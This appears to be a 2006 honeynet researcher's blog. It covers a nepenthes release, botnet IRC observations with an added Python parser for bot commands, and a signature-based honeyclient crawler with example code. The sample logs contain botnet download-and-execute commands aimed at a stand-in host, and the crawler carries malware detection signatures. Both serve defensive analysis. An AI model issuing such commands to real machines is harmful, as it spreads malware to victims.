Nepenthes 0.2

Friday, November 17. 2006
A new version of nepenthes is now available for download. Main changes for nepenthes 0.2 are:
  • module-honeytrap: a new module that ports the idea of honeytrap by Tillmann Werner to nepenthes.
  • submit-postgres: a module to collect binaries in a central database
  • preliminary integration of CWSandbox in nepenthes via submit-norman
  • some fixes and additions to existing modules

Fun With Botnets

Friday, November 10. 2006
Sometimes it is funny to observe botnets, since the controllers are pretty creative in what they do. One example:
08:59 <@F00b4r> .download http://www.example.org/fbi.txt c:\fbi.txt 1
09:00 <@F00b4r> .open www.fbi.gov

The text file contains the following text:
Greetings,
This is fbi, we are investigating your computer, please dont touch the computer
for the next 5minutes, thanks.

I'm wondering how the victims react once such a text pops up and simultaneously the web site of the FBI opens in their browser...
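As an added example (not from the original post), here is a small parser for C&C lines of the kind quoted above, run over a few constructed IRC log lines. The log format (`HH:MM <[@+]nick> text`), the command syntax `.download <url> <dest> [1]` / `.open <url>`, and the reading of the trailing `1` as "run after download" are assumptions for the example; the point is to turn captured bot chatter into a list of URLs worth pulling into a sandbox and of files that were actually executed on the victims.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample IRC log, modelled on the two lines quoted in the post.
# Assumed line format: "HH:MM <[@+]nick> text"; '@' marks a channel operator.
SAMPLE_LOG = [
    r"08:59 <@F00b4r> .download http://www.example.org/fbi.txt c:\fbi.txt 1",
    r"09:00 <@F00b4r> .open www.fbi.gov",
    r"09:02 <victim1234> hey what is going on",
    r"09:05 <@F00b4r> .download http://www.example.org/update.exe c:\windows\svc.exe 1",
    r"09:06 <+helper> .download http://www.example.org/readme.txt c:\readme.txt",
]

LINE_RE = re.compile(r"^(?P<time>\d{2}:\d{2}) <(?P<mode>[@+%]?)(?P<nick>[^>]+)> (?P<text>.*)$")

@dataclass
class BotCommand:
    time: str
    nick: str
    is_op: bool
    command: str          # "download" or "open"
    url: str              # normalised to include a scheme
    dest: Optional[str]   # drop path on the victim (download only)
    run_after: bool       # assumed meaning of the trailing "1" on .download

def normalize_url(raw: str) -> str:
    """Bot commands often omit the scheme; assume http if none is given."""
    return raw if re.match(r"^[a-z][a-z0-9+.-]*://", raw, re.I) else "http://" + raw

def parse_command(line: str) -> Optional[BotCommand]:
    m = LINE_RE.match(line)
    if not m or not m.group("text").startswith("."):
        return None                      # ordinary chatter, not a bot command
    parts = m.group("text").split()
    cmd = parts[0][1:].lower()
    common = dict(time=m.group("time"), nick=m.group("nick"), is_op=m.group("mode") == "@")
    if cmd == "download" and len(parts) >= 3:
        run = len(parts) >= 4 and parts[3] == "1"
        return BotCommand(command=cmd, url=normalize_url(parts[1]), dest=parts[2],
                          run_after=run, **common)
    if cmd == "open" and len(parts) >= 2:
        return BotCommand(command=cmd, url=normalize_url(parts[1]), dest=None,
                          run_after=False, **common)
    return None                          # unknown or malformed command

def extract_commands(lines) -> List[BotCommand]:
    return [c for c in map(parse_command, lines) if c is not None]

def urls_to_fetch(commands) -> List[str]:
    """URLs worth pulling into a sandbox: everything the bots were told to download."""
    return sorted({c.url for c in commands if c.command == "download"})

def executed_drops(commands) -> List[str]:
    """Destination paths that were downloaded *and* run; highest-priority artefacts."""
    return [c.dest for c in commands if c.command == "download" and c.run_after]

if __name__ == "__main__":
    cmds = extract_commands(SAMPLE_LOG)
    for c in cmds:
        print(c)
    print("fetch:", urls_to_fetch(cmds))
    print("executed:", executed_drops(cmds))
```

In practice the fetch list feeds the same submit path as nepenthes' own downloads, so the binaries end up in the collection database next to the ones captured by exploit emulation.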

Low-Interaction Honeyclient

Friday, November 10. 2006
I think I did not blog about this project yet, so here is some news from our lab and the German Honeynet Project. Ali Ikinci is implementing, as part of his diploma thesis, a low-interaction honeyclient that is capable of detecting malicious websites based on signatures. The basic idea is to crawl the Web and then examine the downloaded files with different kinds of mechanisms. We start with simple heuristics like the output of common AV engines, but we plan to also integrate more advanced analysis methods, e.g., with the help of CWSandbox. In addition, we will extend the honeyclient with other input mechanisms like e-mails.

Crawling the Web is fun, especially with a big pipe and a one terabyte ethernet disk. Some stats from preliminary tests: we downloaded more than 175,000 URIs in about one hour. The download itself runs at a couple of hundred KB/sec on average, and we collected more than 4 GB of data during this span of time. We already detected some malware in this data; more stats will follow in the next few weeks.
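An added example of the crawl-then-examine pipeline described above (this is not the lab's honeyclient code and is not from the original post): a breadth-first, same-host crawler over a constructed in-memory web, with constructed byte-pattern signatures standing in for the AV engine output the post mentions, plus one structural heuristic that a low-interaction honeyclient can apply without running anything (a PE file served with a text Content-Type). Hidden iframes and script sources are followed like links, since that is where drive-by content usually hides. All URLs, file contents and signatures are made up for the example.

```python
import hashlib
from collections import deque
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urljoin, urlparse

# Constructed in-memory "web": URL -> (Content-Type, body). It stands in for
# the network so the example runs offline; a real crawler would fetch over HTTP.
FAKE_WEB: Dict[str, Tuple[str, bytes]] = {
    "http://example.org/": ("text/html",
        b'<html><body><a href="/downloads.html">downloads</a>'
        b'<iframe src="/ads/x.html" width="0" height="0"></iframe>'
        b'<a href="http://other.example.net/">off-site</a></body></html>'),
    "http://example.org/downloads.html": ("text/html",
        b'<a href="/files/tool.exe">tool</a><a href="/files/notes.txt">notes</a>'
        b'<a href="/files/missing.txt">gone</a><a href="/">home</a>'),
    # A PE file served with a text Content-Type, plus a constructed marker string.
    "http://example.org/files/tool.exe": ("text/plain",
        b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 24 + b"EXAMPLE-DROPPER-MARKER"),
    "http://example.org/files/notes.txt": ("text/plain", b"nothing to see here\n"),
    # Hidden iframe target carrying a heap-spray style NOP sled in script.
    "http://example.org/ads/x.html": ("text/html",
        b'<html><script>var s = unescape("%u9090%u9090%u9090");</script></html>'),
}

# Constructed byte-pattern signatures; a real deployment would use AV engine
# output (as the post describes) or a signature language such as YARA.
SIGNATURES = [
    ("example-dropper-marker", b"EXAMPLE-DROPPER-MARKER"),
    ("heap-spray-nop-sled", b'unescape("%u9090%u9090'),
]

class LinkExtractor(HTMLParser):
    """Collects href/src targets from a, iframe, script and img tags."""
    def __init__(self):
        super().__init__()
        self.links: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("a", "iframe", "script", "img"):
            for name, value in attrs:
                if name in ("href", "src") and value:
                    self.links.append(value)

def classify(content_type: str, body: bytes) -> List[str]:
    """Signature hits plus one structural heuristic: executables served as text."""
    hits = [name for name, pattern in SIGNATURES if pattern in body]
    if body.startswith(b"MZ") and content_type.startswith("text/"):
        hits.append("pe-served-as-text")
    return hits

def fake_fetch(url: str):
    return FAKE_WEB.get(url)   # None plays the role of a 404 / connection error

def crawl(seed: str, fetch=fake_fetch, max_pages: int = 1000):
    """Breadth-first, same-host crawl; returns per-URL verdicts and run stats."""
    host = urlparse(seed).netloc
    queue, seen = deque([seed]), {seed}
    results: Dict[str, dict] = {}
    stats = {"fetched": 0, "bytes": 0, "failed": 0}
    while queue and stats["fetched"] < max_pages:
        url = queue.popleft()
        got = fetch(url)
        if got is None:
            stats["failed"] += 1
            continue
        ctype, body = got
        stats["fetched"] += 1
        stats["bytes"] += len(body)
        results[url] = {"sha1": hashlib.sha1(body).hexdigest(), "hits": classify(ctype, body)}
        if ctype.startswith("text/html"):
            extractor = LinkExtractor()
            extractor.feed(body.decode("utf-8", "replace"))
            for link in extractor.links:
                target = urljoin(url, link)
                # Stay on the seed's host; iframes and scripts get followed too.
                if urlparse(target).netloc == host and target not in seen:
                    seen.add(target)
                    queue.append(target)
    return results, stats

def flagged_urls(results) -> List[str]:
    return sorted(url for url, r in results.items() if r["hits"])

if __name__ == "__main__":
    results, stats = crawl("http://example.org/")
    print(stats)
    for url in flagged_urls(results):
        print(url, results[url]["hits"])
```

The SHA-1 per fetched body is what lets a run like the one above (175,000 URIs, 4 GB) be de-duplicated before anything is handed to an AV engine or a sandbox; swapping `fake_fetch` for a real HTTP fetcher is the only change needed to run it against live sites.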